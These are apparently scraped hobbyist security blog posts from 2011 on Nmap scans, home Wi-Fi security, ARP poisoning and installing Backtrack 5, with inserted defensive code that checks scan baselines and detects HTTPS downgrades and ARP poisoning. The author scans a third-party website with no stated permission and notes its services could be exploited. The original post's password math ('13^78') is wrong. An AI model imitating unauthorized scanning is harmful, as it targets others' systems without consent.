About 1/5th of the way down, after the "PORT STATE SERVICE VERSION" line, it lists "80/tcp open http Google http 2.0 (GFE)"<br />
Well, what does all that mean? It means that port 80 over TCP (there are two kinds of ports, TCP and UDP, if you didn't know) is open, and that the service on that port is their HTTP server, reported as "Google http 2.0".<br />
Below that it states that 113 is closed, and 443 is open as well. <br />
Well, 80 is the classic HTTP (hypertext transfer protocol) which is how we connect to google.com and all other sites, and 443 is the HTTPS which is the "secure" version of websites (gmail uses HTTPS rather than HTTP as we saw in the Wifi-sniffing tutorial).<br />
Since Google only has two ports open, this doesn't give us much information, since we already KNOW those are open from connecting to google.com and gmail.com (an HTTP version and an HTTPS version).<br />
<br />
At the bottom is a "traceroute" which counts the "hops" or how many nodes away it took to connect to Google.com. Since I live in Upstate New York, you can see the first hop address is "cable1-0.albynygnv-ar401.nyroc.rr.com (67.252.0.1)" which means my computer sent packets to that IP address first, which then routed them to the second, third, fourth, fifth, sixth and finally the seventh hop which then sent it to Google.com, completing the "route" which we traced (hence "traceroute").<br />
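As an added example (not code from the original post or from the Nmap project), here is a small parser for the "PORT STATE SERVICE" table described above, plus a comparison against a baseline of ports you expect to be open, which is the useful way to read a scan of your own machine. The scan text is constructed to look like the output described above; the host name and address in it are placeholders, not a real scan. Nmap's -oN option writes this same normal output to a file, which can be fed to these functions instead:

```bash
#!/bin/bash
# Added example (not from the post or the Nmap project): pull the port table
# out of Nmap's normal output and compare it with a baseline of expected open
# ports.  SAMPLE_SCAN is constructed; the host and address are placeholders.

SAMPLE_SCAN='Starting Nmap 5.51 ( http://nmap.org ) at 2011-07-21 23:33 EDT
Nmap scan report for www.example.com (192.0.2.10)
Host is up (0.021s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE  VERSION
80/tcp  open   http     Example http 2.0
113/tcp closed ident
443/tcp open   ssl/http Example http 2.0

Nmap done: 1 IP address (1 host up) scanned in 12.34 seconds'

# Print the ports (as "80/tcp") whose STATE column equals $1.
# Nmap normal output is read from standard input.
ports_in_state() {
    awk -v want="$1" '$1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == want { print $1 }'
}

# Print every open port that is not in the space-separated baseline $1,
# e.g. unexpected_open_ports "22 443".  Output means: investigate this port.
unexpected_open_ports() {
    allowed=" $1 "
    ports_in_state open | while read -r port; do
        number=${port%%/*}                 # "80/tcp" -> "80"
        case $allowed in
            *" $number "*) ;;              # on the baseline, nothing to report
            *) echo "$port" ;;             # open but not expected
        esac
    done
}

demo() {
    echo "open:   $(printf '%s\n' "$SAMPLE_SCAN" | ports_in_state open | tr '\n' ' ')"
    echo "closed: $(printf '%s\n' "$SAMPLE_SCAN" | ports_in_state closed | tr '\n' ' ')"
    echo "open but not on baseline '443': $(printf '%s\n' "$SAMPLE_SCAN" | unexpected_open_ports 443 | tr '\n' ' ')"
}

demo
```

Re-running a scan of your own host on a schedule and diffing it against the baseline this way is how an unexpected listener (a new service, a misconfiguration, or something that should not be there) gets noticed early.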
<br />
Let's make nmap produce a little less output, since the extra may confuse you. In the "command" line you may have noticed the "-v" option, which stands for verbose (meaning "wordy").<br />
With this option on, nmap gives us more output than it does normally, and many people appreciate this. For now, let's turn it off by selecting the "-v" and deleting it. The "profile" will go blank, but don't worry; it went blank because we're now using a "custom" command. Try rerunning the scan after deleting that section. The output for me is below.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_MC2pb3getQ9yXRxMS0QoNQXWwC04tMzr7QaefdCGcwllhig7rTBjeffhy2uc8YmJ-ElxNnh29RUpV4lP0Na0haRZ5rVCNUSbxS7xmHUG0GQZuiOC0Oh9CM2nn9u0gskLoX8yQ5QKhMc/s1600/7+-+nmap+scan+intense+without+verbose.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_MC2pb3getQ9yXRxMS0QoNQXWwC04tMzr7QaefdCGcwllhig7rTBjeffhy2uc8YmJ-ElxNnh29RUpV4lP0Na0haRZ5rVCNUSbxS7xmHUG0GQZuiOC0Oh9CM2nn9u0gskLoX8yQ5QKhMc/s400/7+-+nmap+scan+intense+without+verbose.JPG" width="392" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Non-verbose Google.com Nmap scan</td></tr>
</tbody></table>Well that seems a lot easier to digest, right? There's still a lot of information you won't understand but all the basics we went over before are still there, it's just a sweeter and shorter output. Verbose has its time and place and I definitely suggest having it on if you can handle it, but at first try having it off to de-clutter your output.<br />
<br />
Let's try scanning a REAL target that isn't as secure as Google. I'll be editing out the website I'm scanning so as not to cause any security issues for them, but it will still give a good output for you to review.<br />
<br />
Here's my output with verbose off for the website I'm scanning (website name and IPs edited):<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjS-7wWYTp2qKJMnfDTIvwWJF1EqU1dNr9hZ7-AuYb4yIS9d6D4yhIe49EdAuGHGj0UIbHp3UOrGEavHvXimb7XIsQiY_g4BKYjvcnrTf2VtPhHprfYboht3-dbmkO5DEZXqOKKnhpSI4/s1600/9+-+nmap+scan+intense+without+verbose+on+website.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjS-7wWYTp2qKJMnfDTIvwWJF1EqU1dNr9hZ7-AuYb4yIS9d6D4yhIe49EdAuGHGj0UIbHp3UOrGEavHvXimb7XIsQiY_g4BKYjvcnrTf2VtPhHprfYboht3-dbmkO5DEZXqOKKnhpSI4/s400/9+-+nmap+scan+intense+without+verbose+on+website.jpg" width="388" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Non-verbose website Nmap scan</td></tr>
</tbody></table>Now there's a good scan. We can see that they have their FTP, SSH, SMTP, POP3 and other ports open with running applications!<br />
FTP is a commonly used protocol called File Transfer Protocol and can be exploited to gain access to sensitive information stored on the server.<br />
SSH is of course the Secure Shell server and can be used to gain root access to the server and a slew of interesting things.<br />
SMTP is the Simple Mail Transfer Protocol, used for sending mail, and can, of course, be exploited to gain access to mail and other things.<br />
POP3 is the Post Office Protocol and is a way for clients to retrieve mail from the server. Guess what we can do with it? Exploit it to gain access to their mail servers.<br />
The other ports are interesting, too, and can also be exploited in various ways.<br />
<br />
Hopefully I'll be able to show you exploits pertaining to these types of services in the near future, but they will probably be on insecure boxes I've loaded myself and not REAL targets, since I'm not experienced enough to gain access to updated and regularly scanned targets... yet.<br />
<br />
Now, I would show you a localhost (your computer) ping, but unfortunately the Windows version of Nmap has issues with this, so if you want to scan your own computer and see what ports are open and how to secure them, check out the Linux version of Nmap and my tutorial above for this information.<br />
<br />
<strike>I was also trying to set up my vulnerable VMWare to ping from my machine but apparently I can't since it's still considered the "localhost" (which is my machine), to any of my more advanced readers, is there any way around this so I can Nmap my VMWare from my XP? I'll be doing this from my Linxtop in the above tutorial in Linux, so you can view it there, but for now I can't show a more interesting Nmap scan, sorry!</strike>I figured out my problem... and it was stupidly simple, but I've been working and tired a lot so it must have slipped through my mind. I'll hopefully have a more in-depth tutorial up soon =D<br />
<br />
</div>
<br />
Marshall, 2011-07-04 (updated 2022-12-14)<br />
<b><u><span class="Apple-style-span" style="font-size: x-large;">Securing your personal home network [Information]</span></u></b><div dir="ltr" style="text-align: left;" trbidi="on">
<div>
<div dir="ltr" style="text-align: left;" trbidi="on">
Today's the 4th of July so I'm throwing out a quick post since it's been a few days, but I hope all my readers will be happy with another informational piece about securing your own network since, after all, that's what netsec is about!<br>
<br>
Below is a simple guide to getting the most security out of your network to protect your information and the users of your network's information.<br>
<br>
<a name="more"></a><br>
<br>
<span style="font-size: large;"><b>Setting up your router encryption:</b></span><br>
<blockquote>
<span style="font-size: small;">If you've read my <a href="http://hackavision.blogspot.com/2011/06/cracking-wepwpa2-networks-with-aircrack.html">WEP/WPA2 cracking guide</a></span>, then you understand how fragile WEP encryption is. In my tutorial I also explained how to crack WPA1/2 passwords, but explained that the passkey must be in the dictionary that you specified whilst entering the "aircrack" command.<br>
<br>
When you're selecting which encryption to use, don't even consider WEP. It can be broken in 30 seconds on a half-decent computer. I've successfully broken WEP in under two minutes sitting in a bathroom on a small dell laptop.<br>
<br>
As for what TO use, choose either WPA or WPA2. WPA2 has some slight upgrades over its predecessor WPA, but there is no noticeable difference whilst cracking WPA2 versus WPA.<br>
<br>
When setting up your network password there are some obvious things that you don't want to set it as, such as "password," "admin," "12345," "qwerty," or anything so simple a 10 word passkey list could find.<br>
Your best bet is setting a password with a length of <i>AT LEAST</i> 8. Don't just use letters with a number after them; switch it up with symbols too. For instance, an almost unbreakable 8-character password would be "Z9t*F3&w", since it's a completely random selection of letters, numbers, and symbols and definitely would not appear in any normal dictionary or common password list.<br>
If you get into the teens of length, your password becomes exponentially more secure.<br>
If you have a password with a length of 13, assuming we only use numbers 0-9, all the symbols on the top row of our keyboard "`~!@#$%^&*)(_+-=" and a-z and A-Z, if my math is correct that is 78 different combinations per spot, which means that the different possibilities would be 13^78 or 7.71936328 × 10^<span style="font-size: small;">86 which would take much longer than anyone's lifetime to crack.</span><br>
These are some simple tips to making your network unbreakable by hackers outside your network, but what about if a hacker is already inside your network?</blockquote>
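<blockquote>
Added worked calculation (not part of the original post, using the post's own figures): with N symbols available at each of L positions, the number of possible passwords is N^L, with the alphabet size as the base and the length as the exponent. For the example above, N = 78 and L = 13, so the space is 78^13 ≈ 3.96 × 10^24. At an assumed (not measured) rate of 10^9 guesses per second, exhausting it would take roughly 1.3 × 10^8 years. For the 8-character example, 78^8 ≈ 1.37 × 10^15, which is about 16 days at the same assumed rate, which is why going into the teens of length, as recommended above, matters more than any single extra symbol.
</blockquote>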
<span style="font-size: large;"><b>Safe Internet usage:</b></span><br>
<blockquote>
If you have any experience with <a href="http://hackavision.blogspot.com/2011/06/installing-ettercap-linux.html">Ettercap</a> then you know how easy it is to view a person's traffic and steal valuable information such as passwords and logins. To counteract this, we as Internet and network users need to surf smart, watch which websites we visit, and be aware of the dangers out there, like certain pop-ups that install viruses and malware on our computers.<br>
<br>
I'm sure a lot of you have seen certain pop-ups that say something like "your computer is infected, run a free test now!"</blockquote>
<blockquote>
These images require a user to click "yes" or even "no" or the exit button in the top right or left (depicted with an X); once this action has occurred, malicious software is installed on your computer and a fake virus scan runs showing that you have certain viruses, where the <i>ACTUAL</i> virus is the software itself! <br>
The way to defend against these "phishing" attacks (the word phishing gets its name from fishing: a person throws out a hook, the scams, enough times and someone will bite) is to know what's fake and what's not. Know your anti-virus and don't click on popups while browsing the Internet. If you're using Firefox, install Adblock and Noscript, but remember to allow sites you frequent or they may not work correctly. Chrome and Opera also support their own versions of these, so check out the "addon" page for each respective browser. <br>
Being aware of these and other phishing attacks, such as email spam, is an important part of having top notch security.<br>
<br>
We must also be aware of unauthorized users in our networks, whether it be a guest on an open network, or a malicious hacker in our (hopefully) protected network. <br>
Ways to defend against attacks from INSIDE our network include using "HTTPS" sites to log in with sensitive information, instead of the classic "HTTP" type of authentication. <br>
HTTP stands for Hypertext Transfer Protocol, and the S on the end of HTTPS stands for "secure." </blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja-pipmQtQNvbX7IXZho0xyjpKkdE01RfUKPDaeAAoFvXFODqVM7mdl6-sqo1LmpnwE1zKQo2OnEvfi53ERk_9gz4UsIyDqfNxweid6KRc7-Y_EVJilRnFoDT2_juWXu0XX4V_bL3xng0/s1600/HTTPS.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja-pipmQtQNvbX7IXZho0xyjpKkdE01RfUKPDaeAAoFvXFODqVM7mdl6-sqo1LmpnwE1zKQo2OnEvfi53ERk_9gz4UsIyDqfNxweid6KRc7-Y_EVJilRnFoDT2_juWXu0XX4V_bL3xng0/s400/HTTPS.JPG" width="400"></a></div>
<blockquote>
Even if all your sensitive information is processed through HTTPS, there are ways for hackers to disable the secure connection and steal your information regardless. Using this method of logging in adds another layer of security to our everyday Internet usage, but it can still be disabled and worked around, as you can see in my post involving Ettercap, SSLStrip, and ARP spoofing to steal secure passwords.</blockquote>
<blockquote>
How you can attempt to defend against attacks like the one I explained in my password sniffing post is to make sure you're not being redirected away from HTTPS sites to their insecure HTTP counterparts. If this is happening I would suggest reviewing the nodes on your network, because someone is running a redirection on you with SSLStrip and trying to steal your information!</blockquote>
<blockquote>
Another way to detect this attack is to regularly check your network speeds. A side effect of an ARP spoofing redirection attack is that it bogs down your network, even DoSing (denial-of-service attacking) the network if the computer that is redirecting traffic is slow or can't handle all the packets being passed through. I've noticed another side effect of these attacks that can be watched for: when attempting to log onto HTTPS sites, it redirects you (which isn't very easy to notice if you're a common user), but then doesn't allow you to log in (it just reloads the login page). This is because the forwarding breaks the login page and doesn't allow you to pass your credentials in.</blockquote>
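Here is a small added example, not code from the original post, of what the "am I being pushed from HTTPS to HTTP?" check above looks like when written down. It runs over a constructed list of request/response records (the kind a logging proxy or browser add-on could keep) and reports two things: any HTTPS request answered with a redirect to a plain-HTTP URL, and any plain-HTTP request to a host on a hypothetical list of sites that should only ever be reached over HTTPS, unless that request is immediately bounced back to HTTPS (the normal "type the site name, get upgraded" behaviour). The host list, the record shape and the sample records are all constructed for the example; browsers do the same job automatically with HSTS.

```python
from urllib.parse import urljoin, urlsplit

# Hypothetical list of hosts the user knows should only ever be reached over
# HTTPS; a browser's HSTS store plays the same role automatically.
HTTPS_ONLY_HOSTS = {"bank.example.com", "mail.example.com", "shop.example.com"}

# Constructed records in the shape a logging proxy or browser add-on might keep:
# (requested URL, response status code, Location header or None).
SAMPLE_RECORDS = [
    ("https://mail.example.com/login", 200, None),                             # normal
    ("https://bank.example.com/login", 302, "http://bank.example.com/login"),  # downgrade
    ("http://shop.example.com/", 301, "https://shop.example.com/"),            # normal upgrade
    ("https://shop.example.com/account", 302, "/account?step=2"),              # relative, stays HTTPS
    ("http://bank.example.com/login", 200, None),                              # login page in the clear
    ("http://news.example.org/", 200, None),                                   # not a sensitive host
]

REDIRECT_STATUSES = {301, 302, 303, 307, 308}


def redirect_target(url, status, location):
    """Absolute URL a response redirects to, or None when it is not a redirect.

    A relative Location header is resolved against the request URL, so it
    keeps the request's scheme.
    """
    if location is None or status not in REDIRECT_STATUSES:
        return None
    return urljoin(url, location)


def is_downgrade_redirect(url, status, location):
    """True when an HTTPS request is answered with a redirect to a plain-HTTP URL."""
    target = redirect_target(url, status, location)
    return (
        target is not None
        and urlsplit(url).scheme == "https"
        and urlsplit(target).scheme == "http"
    )


def is_unprotected_http(url, status, location):
    """True for plain HTTP to an HTTPS-only host that is not immediately upgraded.

    An http:// hit answered with a redirect to https:// is the usual
    "type the site name, get bounced to HTTPS" behaviour and is not reported.
    """
    parts = urlsplit(url)
    if parts.scheme != "http" or parts.hostname not in HTTPS_ONLY_HOSTS:
        return False
    target = redirect_target(url, status, location)
    return target is None or urlsplit(target).scheme != "https"


def audit_records(records):
    """Return (reason, url) pairs for every record that looks like a downgrade."""
    findings = []
    for url, status, location in records:
        if is_downgrade_redirect(url, status, location):
            findings.append(("https-to-http redirect", url))
        elif is_unprotected_http(url, status, location):
            findings.append(("plain http to https-only host", url))
    return findings


if __name__ == "__main__":
    for reason, url in audit_records(SAMPLE_RECORDS):
        print(f"{reason}: {url}")
```

Run as-is it reports the two bank.example.com records and nothing else; the relative redirect and the normal http-to-https upgrade are deliberately left alone, because reporting those would bury the real finding in noise.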
</div>
</div>
</div>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-35107528624407728862011-07-01T12:14:00.000-04:002011-07-01T12:14:35.508-04:00What is ARP? [Information]<div dir="ltr" style="text-align: left;" trbidi="on"> Since I've explained now how to get Backtrack 5, if you're still not on Linux then go <a href="http://hackavision.blogspot.com/2011/06/so-you-want-to-use-backtrack-5.html">install it now</a> before all the fun stuff starts!<br />
As for today's post I'll be explaining an important part about netsec: Address Resolution Protocol.<br />
<br />
Understanding ARP, or Address Resolution Protocol, is a key part in understanding how networks communicate.<br />
<br />
<a name='more'></a>You can think of ARP as a phonebook for computers on a network.<br />
Say the computer "Bob-PC" wants to send a message to "Meg-Laptop" but only has its local IP address. Computers require the "physical" address or MAC (Media Access Control) address to send messages, so Bob's computer needs to find out Meg's MAC. How would it do this?<br />
Well, what Bob's computer does is check its own "ARP cache", which is a list of computers it has stored with their IPs (such as 192.168.0.105) and MAC addresses (such as 00:1C:F2:D2:55), and if it finds the physical (MAC) address corresponding to the IP address it has for Meg's laptop, it's all good to go!<br />
<br />
But what if Bob's PC's ARP cache doesn't have Meg's laptop listed?<br />
Well, ARP has this sorted out. It sends out a "broadcast ARP message" to the network saying "hey, who is 192.168.0.105 (Megs-Laptop)?" and receives a response from Meg's laptop saying "hey, that's me! My MAC address is 00:1C:F2:D2:55!"<br />
Bob's PC then stores that information in its ARP cache for later use.<br />
<br />
How hackers can use this to infiltrate systems is doing something called "ARP poisoning" and can be explained using this image from Wikipedia:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhyW-ELAnnkPcEawMxlvch6VPudU9tOy8ekJtcjD-sjjy-cG5MEEWqlg2vz494DB6a61wfWpBPMmFalv-AOD2RqseWZiVeZTzmOqhFubg9J7V9bhwVxrnCMqZc2_pvXTPmJu549G3nV8M/s1600/ARP+MITM.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhyW-ELAnnkPcEawMxlvch6VPudU9tOy8ekJtcjD-sjjy-cG5MEEWqlg2vz494DB6a61wfWpBPMmFalv-AOD2RqseWZiVeZTzmOqhFubg9J7V9bhwVxrnCMqZc2_pvXTPmJu549G3nV8M/s400/ARP+MITM.JPG" width="400" /></a></div>The malicious user, or hacker, listens in on the network and changes the ARP cache of the receiving "LAN user" to send messages to the malicious user FIRST, then back out to the corresponding target (in this case, the LAN Gateway).<br />
This way, the hacker can view all the network traffic between the User and Gateway and change certain inquiries, whether they be to an HTTPS (secure connection) site or any site in general.<br />
We will be using this in the near future to sniff passwords from any site (HTTP and HTTPS) and show how dangerous an unwanted user on your network really is.<br />
<br />
You can view your computer's ARP cache by typing "arp -a" into the command line on Windows or Linux and view the IP addresses and corresponding MAC addresses of each node your computer has saved.<br />
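As an added example (not code from the original post), here is a small Python script that does what "reviewing the nodes on your network" with "arp -a" means in practice. It reads "arp -a" output in both its Windows and Linux layouts and looks for the two signs of a poisoned cache: one MAC address listed for more than one IP (in a poisoned cache the attacker's MAC usually shows up for its own IP and for the gateway's), and an IP, typically the gateway's, whose MAC differs from a snapshot taken while the network was trusted. The table text, host names and MAC addresses are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed "arp -a" output in the Windows layout, taken while the network was trusted.
CLEAN_WINDOWS_ARP = """\
Interface: 192.168.0.101 --- 0xb
  Internet Address      Physical Address      Type
  192.168.0.1           00-1c-f2-d2-55-01     dynamic
  192.168.0.105         00-1c-f2-d2-55-02     dynamic
  192.168.0.150         00-1c-f2-d2-55-03     dynamic
  192.168.0.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# Constructed "arp -a" output in the Linux layout, after the host at .150 has
# claimed the gateway's IP (192.168.0.1) with its own MAC.
POISONED_LINUX_ARP = """\
? (192.168.0.1) at 00:1c:f2:d2:55:03 [ether] on wlan0
Megs-Laptop (192.168.0.105) at 00:1c:f2:d2:55:02 [ether] on wlan0
? (192.168.0.150) at 00:1c:f2:d2:55:03 [ether] on wlan0
"""

# One pattern covers both layouts: "192.168.0.1   00-1c-f2-d2-55-01   dynamic"
# and "? (192.168.0.1) at 00:1c:f2:d2:55:01 [ether] on wlan0".
ARP_LINE = re.compile(
    r"\(?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\)?\s+(?:at\s+)?"
    r"(?P<mac>(?:[0-9a-fA-F]{2}[:-]){5}[0-9a-fA-F]{2})"
)


def normalize_mac(mac):
    """Lower-case, colon-separated form so Windows and Linux entries compare equal."""
    return mac.lower().replace("-", ":")


def parse_arp_table(text):
    """Return {ip: mac} from "arp -a" output, skipping broadcast and multicast rows."""
    table = {}
    for line in text.splitlines():
        match = ARP_LINE.search(line)
        if not match:
            continue
        mac = normalize_mac(match.group("mac"))
        if int(mac[:2], 16) & 1:  # group bit set: broadcast/multicast, not a host
            continue
        table[match.group("ip")] = mac
    return table


def find_duplicate_macs(table):
    """MACs that answer for more than one IP, as {mac: [ip, ...]}."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def find_changed_macs(baseline, current):
    """IPs whose MAC differs from the trusted baseline: {ip: (old_mac, new_mac)}."""
    return {
        ip: (baseline[ip], current[ip])
        for ip in baseline
        if ip in current and baseline[ip] != current[ip]
    }


if __name__ == "__main__":
    clean = parse_arp_table(CLEAN_WINDOWS_ARP)
    now = parse_arp_table(POISONED_LINUX_ARP)
    for mac, ips in find_duplicate_macs(now).items():
        print(f"{mac} is listed for several IPs: {', '.join(ips)}")
    for ip, (old, new) in find_changed_macs(clean, now).items():
        print(f"{ip} changed from {old} to {new}")
```

The baseline comparison is the more reliable of the two checks: a duplicate MAC can have an innocent explanation (a router with several addresses, for instance), but the gateway's MAC changing underneath you between two snapshots is exactly what a poisoning attack produces and almost never happens on its own.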
<br />
Many users think that if they have a simple encryption on their network, it can't be broken. Some think that even if someone gains access into their network, it doesn't even matter! But this is <em>FAR</em> from the truth. <br />
You will see how much damage a single user can cause on an unprotected network, whether it be through DNS spoofing (changing which site certain IP addresses go to), password sniffing (Facebook, Google, Paypal, and Myspace passwords in clear text!), or DoS (denial of service) attacks.<br />
<br />
This was a quick writeup and I'll be updating it frequently as I do with all my posts, but I wanted to get a quick post out to explain what ARP and ARP poisoning is, as it is vital in our path to learning network and computer security.</div>Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-72182216439962294852011-06-29T18:27:00.004-04:002022-12-20T10:46:27.081-05:00[OLD] So you want to use Backtrack 5? [With Pictures/Windows/Mac/Linux]<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
<div dir="ltr" style="text-align: left;" trbidi="on">
I'm seeing a lot of my viewers still use Windows, and since I haven't posted any Windows information yet (don't worry, I will!) I felt like posting a how-to on dual-booting (or single-booting) the penetration testing suite I use called Backtrack 5 would be very helpful to everyone viewing my blog.<br />
<br />
<div style="text-align: left;">
Here's a quick list of the things you'll need to install Backtrack 5:</div>
<ol style="text-align: left;">
<li style="text-align: left;">a USB stick with at least 2gigs of free space (mine is 8gigs), I would suggest 4gigs as a minimum.</li>
<li style="text-align: left;">a computer to install it to (you can dualboot, or fresh install and overwrite a disk)</li>
<li style="text-align: left;">an Ethernet Internet connection makes this easier in the updating stage.</li>
</ol>
<br />
<a name='more'></a>First we're going to have to format your USB stick-drive (or whatever you want to call it... pendrive or stick) to "FAT 32" (File Allocation Table) which is not the normal format most USB drives use. The default is usually NTFS (New Technology File System) and supports higher file sizes and is in general faster than FAT 32. You can read more on the differences <a href="http://www.ntfs.com/ntfs_vs_fat.htm">here</a>.<br />
<br />
Plug in your USB stick to a computer that can connect to the Internet (I'm assuming, since you're reading this, that you can download and transfer files) and go to "My Computer" on Windows, or your respective file system directory. I'm using Windows XP SP3, so the screenshots and most of my references will be based upon the look and feel of that. If you have a different OS then I'll try to help you troubleshoot it, but I don't have much experience in iOS or Vista at the moment.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipM_SnOhFGLt9zEE-c7-F464sOA85FV0-W6cTDk53RzmmT21a33STa4k-XtH05nAO5H_W-gzl98Sxd1XTKH811W5DG0zJQGaje7wkqfHcS0ZgHj9mvYpUhv1A5e3gilt5uzGTpoElMYeU/s400/1+-+my+computer.JPG" style="margin-left: auto; margin-right: auto;" width="400" /></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The USB pendrive should be visible here.<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipM_SnOhFGLt9zEE-c7-F464sOA85FV0-W6cTDk53RzmmT21a33STa4k-XtH05nAO5H_W-gzl98Sxd1XTKH811W5DG0zJQGaje7wkqfHcS0ZgHj9mvYpUhv1A5e3gilt5uzGTpoElMYeU/s1600/1+-+my+computer.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></td></tr>
</tbody></table>
<div align="left" class="separator" style="clear: both; text-align: center;">
<br /></div>
When you can see the drive, right click it and a "format" option should be available. Click on that option.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK9gfiom3XahUUp7MVwR3-Edv1mswsvTVBNzuPhljH-4oeuoLE9UevbzCp8fMHQfPWmjnIhWgy2cUopyV745Wx0bb1I_Ut_ezpxwbAyuyk7KNACmnFblH1W17FDRMi54nk9irnODJcH2g/s1600/2+-+format.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="365" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK9gfiom3XahUUp7MVwR3-Edv1mswsvTVBNzuPhljH-4oeuoLE9UevbzCp8fMHQfPWmjnIhWgy2cUopyV745Wx0bb1I_Ut_ezpxwbAyuyk7KNACmnFblH1W17FDRMi54nk9irnODJcH2g/s400/2+-+format.JPG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click the "format" option.</td></tr>
</tbody></table>
Once you've clicked it, a GUI (graphical user interface) panel should pop up much like this:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkjOQr8lHJ6-HljmAOnr0t3WjiapYwE8VcCplI4EdpKdJ5OGFDw96xZgfKOTM6d7uLb0ACR29N6PTQ5CkmcQdaxShcvb4FoKeLoP5fDgHkh8IxrqQAtKGOTPu05ryIwiqb-dYOKXdLtfQ/s1600/3+-+format+gui.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkjOQr8lHJ6-HljmAOnr0t3WjiapYwE8VcCplI4EdpKdJ5OGFDw96xZgfKOTM6d7uLb0ACR29N6PTQ5CkmcQdaxShcvb4FoKeLoP5fDgHkh8IxrqQAtKGOTPu05ryIwiqb-dYOKXdLtfQ/s320/3+-+format+gui.JPG" width="204" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">View on Windows XP SP3</td></tr>
</tbody></table>
<b>Make sure you don't have any sensitive information or files you want on your drive... this will completely erase it. Before you do this, save all your files on this drive!<br />
</b><br />
My options are already set like I want, but the "File System" should be "FAT32" and not "NTFS," if you format it as NTFS, it will be pointless. Leave the "allocation unit size" default and name your "volume label" whatever you want; I kept mine the same.<br />
Once you click "START" it will remind you all information will be deleted... so again <b><u>SAVE ANY FILES YOU DON'T WANT TO LOSE FOREVER.</u></b><br />
<br />
It shouldn't take long to format, and a "format complete" pop up will come up. Good job, step 1 is done!<br />
<br />
Now to get Backtrack 5 up on your drive...<br />
Go to the <a href="http://www.backtrack-linux.org/downloads/">Backtrack download page</a> and just click the "download" button in the middle of the screen; you don't need to enter an email if you don't want to.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-_fnuG8jd088/Tgq1Jf4-sPI/AAAAAAAAABY/LVBD-lMqzOM/s1600/4+-+backtrack+download+1.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="327" src="https://4.bp.blogspot.com/-_fnuG8jd088/Tgq1Jf4-sPI/AAAAAAAAABY/LVBD-lMqzOM/s400/4+-+backtrack+download+1.JPG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">You don't have to register, but go ahead if it interests you.</td></tr>
</tbody></table>
The window will change to a selection area of the different "flavors" of Backtrack 5. Below is a quick explanation of each:<br />
<ul style="text-align: left;">
<li>WM Flavor<br />
</li>
<ul style="text-align: left;">
<li>GNOME --- check out the <a href="http://www.gnome.org/">Gnome site</a> for an in-depth view of what it is, but below is a screenshot of the look. I personally use GNOME over KDE.</li>
</ul>
</ul>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
